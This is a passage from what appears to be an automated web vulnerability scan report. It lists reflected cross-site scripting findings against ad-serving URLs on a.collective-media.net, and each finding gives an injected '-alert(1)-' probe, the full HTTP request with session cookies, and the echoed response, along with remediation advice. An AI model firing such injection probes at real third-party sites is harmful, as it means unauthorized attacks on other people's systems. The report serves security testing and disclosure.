Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:14 GMT
Content-Length: 950

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.slashgear632cc'-alert(1)-'15cfcf94192/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ
...[SNIP]...

4.20. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deea5'-alert(1)-'f23de541341 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/generaldeea5'-alert(1)-'f23de541341;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:17 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:17 GMT
Content-Length: 950

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.slashgear/generaldeea5'-alert(1)-'f23de541341;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb
...[SNIP]...

4.21. http://a.collective-media.net/adj/ns.slashgear/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1608b'-alert(1)-'2318f0b3e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?&1608b'-alert(1)-'2318f0b3e1a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:07 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:07 GMT
Content-Length: 954

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
MjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?&1608b'-alert(1)-'2318f0b3e1a=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.22. http://a.collective-media.net/adj/ns.slashgear/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62ff5'-alert(1)-'fb180e95c54 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?62ff5'-alert(1)-'fb180e95c54 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:33:32 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:32 GMT
Content-Length: 951

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
wMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?62ff5'-alert(1)-'fb180e95c54;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.23. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4fe'-alert(1)-'d04fa8fb066 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly1a4fe'-alert(1)-'d04fa8fb066/news;sz=300x600;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:12:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly1a4fe'-alert(1)-'d04fa8fb066/news;sz=300x600;net=q1;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.24. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db2fd'-alert(1)-'2cf845b2eaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/newsdb2fd'-alert(1)-'2cf845b2eaf;sz=300x600;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:12:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/newsdb2fd'-alert(1)-'2cf845b2eaf;sz=300x600;net=q1;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.25. http://a.collective-media.net/adj/q1.philly/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2759'-alert(1)-'b82ad2e7b8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/news;sz=300x600;click0=;ord=[timestamp]?&a2759'-alert(1)-'b82ad2e7b8a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Tue, 10 May 2011 13:12:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/news;sz=300x600;net=q1;ord=[timestamp]?&a2759'-alert(1)-'b82ad2e7b8a=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.26. http://a.collective-media.net/adj/q1.philly/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49fd3'-alert(1)-'bb8c0ffea4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/news;sz=300x600;click0=;ord=[timestamp]?49fd3'-alert(1)-'bb8c0ffea4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:11:53 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/news;sz=300x600;net=q1;ord=[timestamp]?49fd3'-alert(1)-'bb8c0ffea4;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ab13'-alert(1)-'26d95cab4f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj6ab13'-alert(1)-'26d95cab4f8/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:27 GMT
Connection: close
Content-Length: 8137

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-73310115_1305034587","http://ad.doubleclick.net/adj6ab13'-alert(1)-'26d95cab4f8/idgt.slashgear/article_above;net=idgt;u=,idgt-73310115_1305034587,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29249'-alert(1)-'3aa29f3287c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear29249'-alert(1)-'3aa29f3287c/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:31 GMT
Connection: close
Content-Length: 8129

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-55280407_1305034591","http://ad.doubleclick.net/adj/idgt.slashgear29249'-alert(1)-'3aa29f3287c/article_above;net=idgt;u=,idgt-55280407_1305034591,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23043'-alert(1)-'d52c1947d03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear/article_above23043'-alert(1)-'d52c1947d03;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:34 GMT
Connection: close
Content-Length: 8129

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-43379423_1305034594","http://ad.doubleclick.net/adj/idgt.slashgear/article_above23043'-alert(1)-'d52c1947d03;net=idgt;u=,idgt-43379423_1305034594,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sec
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [sec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca6d'-alert(1)-'f7490aa7e07 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear/article_above;sec=4ca6d'-alert(1)-'f7490aa7e07 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
